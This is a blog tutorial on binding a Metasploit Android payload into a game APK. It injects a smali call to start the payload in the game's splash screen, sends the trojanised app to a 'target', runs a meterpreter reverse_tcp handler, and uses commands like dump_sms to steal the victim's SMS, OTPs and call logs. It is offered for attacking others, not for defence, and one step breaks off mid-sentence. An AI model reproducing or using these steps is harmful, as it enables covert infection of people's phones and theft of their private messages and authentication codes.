How To Bind Payload Using Android Mobile Manually. How To Bind Payload Using Android Mobile Manually.
How To Bind Payload Using Android Mobile Manually. If You Are Searching For Bind Payload In Game And Hack Android And Searching For The Best Article To Get The Best Explanation Bind Payload In App And Hack Android. Then You Are In The Right Place.
Today I'm Here Going To Share The Step By Step Tutorial About "How To Bind Payload Using Android Mobile Manually.". By This Article, You Can Get A Lot Of About How To Bind Payload With Apk, Msfvenom Android, How To Hack Over Internet. And I'm Damn Sure That You Will Never Get All These Unique Information Like Us On The Internet Anywhere Else.
We Will Bind Or Inject Our Malicious Payload With The Android App And Exploit It Over Wan Or Lan It Works On Both. So Now Let's Go Through The Practical Part Of Payload Binding.
#Follow Below Step's
1. Make Sure You Already Created Payload From Metasploit If Not Then Please Read Our Recent Post About How To Create Payload And Exploit
2. Now After Creating The Payload Follow Below Steps.
3. Download Apk Editor Pro
Now. Open Apk Editor Pro App After Installing It And Click On Select An Apk From File And Then Your Internal Storage Of The Device Will Be Opened And When You Scroll Down You Can See Your Payload. And Click On It And Click On Full Edit (Resource-Rebuild) And The Decode All Files And Now You Can See The App Main Page With Some Columns. Now In The Downside Of The App You Can See Files Click On It And Here You Can See Many Folders Of App Which Are Used To Make App Functional. Now Click On Smali And Let It Decompile The Dex (Mali Files) Now When Decompilation Is Done You Can See A New Smali Folder In The Same Window. Now Click Open It By Click On It And Inside That You Can See Com Folder Now Once Again Click On It And Inside Com You Can See Metasploit Folder Now Click On The Checkbox And Click On Extract And When You Click On Extract Your Internal Storage Will Be Shown In A Small Window. Now Long Click On An Anything A Small Button Or Pop Up Appears New Folder Just Click On It And Create A New Folder With Name Payload And Click On Ok After That A Folder Will Be Created In You Internal Storage Now Open It By Click On It And When It Opens Click On Ok. Now Here The Metasploit Folder Will Be Saved Into The Payload Folder. So Now Click Back Button In Apk Editor And Stop When You See The Home Screen Of Files. Now Click On The Checkbox Of Androidmanifest.Xml And Click On The Extract And Save That On The Same Payload Folder. Now Both Metasploit And Xml Files Are Saved In The Payload Folder Now.
4. Now Download Any App You Want To Bind.
So. In My This Is The Game In Which We Will Bind Our Payload And Exploit. Now Open Apk Editor Pro Apk And Click On Select An Apk From File And Select Game From The Internal Storage And Click On Decode All Files And Nowhere Also You Can See Files Icon Click On It And When It Open You Can See Many Folders Related To App And Now Click On Smali And Wait For It To Decompile And After That, A Smali Folder Will Be Shown In The Same Window And Now Click On Smali Folder And Open It And Inside It Once Again Click On Com Folder And Nowhere Click On Folder Icon With + Sign And When You Click On It You Will Option Import Folder Now Click On It And Select Payload Folder In Your Internal Storage ( Which Contains Payload Files ) And Open Payload Folder And Click On Metasploit Folder And Click On Ok Then The Metasploit Folder Will Be Imported To Com Folder Of Gagme Apk. Now Come Back To Smali Folder And Click On Com And The On Com And Then On Dotgears And Then Main Game Folder And Inside It, You Need To Search Splashscreen.Smali Now Click On It And An Editor Will Be Opened Now In Editor Find 30th Line Of Code
#Virtualmethods
After Getting This Now Below 30th Code Paste This Code.
Invoke-Static {P0}, Lcom/Metasploit/Stage/Payload;->Start(Landroid/Content/Context;)V
And After Pasting This Code Click On The Save Button And The Save Process Will Be Completed.
Now Come Back To Home Screen Of Game Apk In Apk Editor And Nowhere Click On Androidmanifest.Xml Now Inside This We Need To Inject Some Android Permissions So. Click On It And An Editor Will Be Opened. So When Xml Will Be Opened In The Editor. Now Back To File Manager Of Your Device And Open Payload Folder And Open Android Manifest File By Clicking On It And When It Opens Now Copy This (
5. Now Send That Apk To Your Target And Let Him Install And Open It When He Does So. Now Follow The Below Steps.
#Step 2 (Exploiting Last Step)
$ Cd $Home/Metasploit-Framework
$ ./Msfconsole
Now Open New (2nd) Session And Apply These Commands
$ Pg_Ctl -D $Prefix/Var/Lib/Postgresql Start (Not That Important In Lan)
Now Come Back To (1st Session) In Which You Opened Metasploit Now Apply These Commands.
$ Db_Status
$ Use Exploit/Multi/Handler
$ Set Payload Android/Meterpreter/Reverse_Tcp
$ Set Lhost (Your Ip Here) Or Portmap Host Address
$ Set Lport (The Port You Given)
$ Exploit
#Step 3 (Hacking Details After Meterpreter Session)
Now When You Get Meterpreter Session Of Your Victim Device Follow The Below Steps To Get His Info.
Ex :-
Meterpreter> Help
(Now Here All The Commands To Dump Data Will Be Shown Now Use Them According To You Needs For Example.)
Meterpreter > Dump_Sms
This Command Gets All Our Victims Mobile Sms And Otp's And It Will Be Saved In .Txt Formate Like Sms5563543bbfbbff.Txt
Like This You Can Fetch And Save Many Things As I Said In The Beginning Of This Post And To See Saved Or Fetched Data.
$ Cd $Home/Metasploit-Framework
$ ls
Here, You Will Get All The Saved .Txt Call Logs And Information And Etc... To See That
$ Cat Calllogs586464dec564.Txt
This Will Show All Info In Script Formate. So Guys That's All For Today So I Hope You Liked This One. So Like This Whenever Your Victim Plays The Game You Will The Session And You Can Use It Without Any Issues.
How To Bind Payload Using Android Mobile Manually.
Reviewed by Surjeet Roy
on
March 27, 2021
Rating:
No comments:
To insert a short code, use & lt; i rel = & quot; code & quot; & gt; ... CODE ... & lt; / i & gt;
To insert a long code, use & lt; i rel = & quot; pre & quot; & gt; ... CODE ... & lt; / i & gt;
To insert an image, use & lt; i rel = & quot; image & quot; & gt; ... PICTURE URL ... & lt; / i & gt;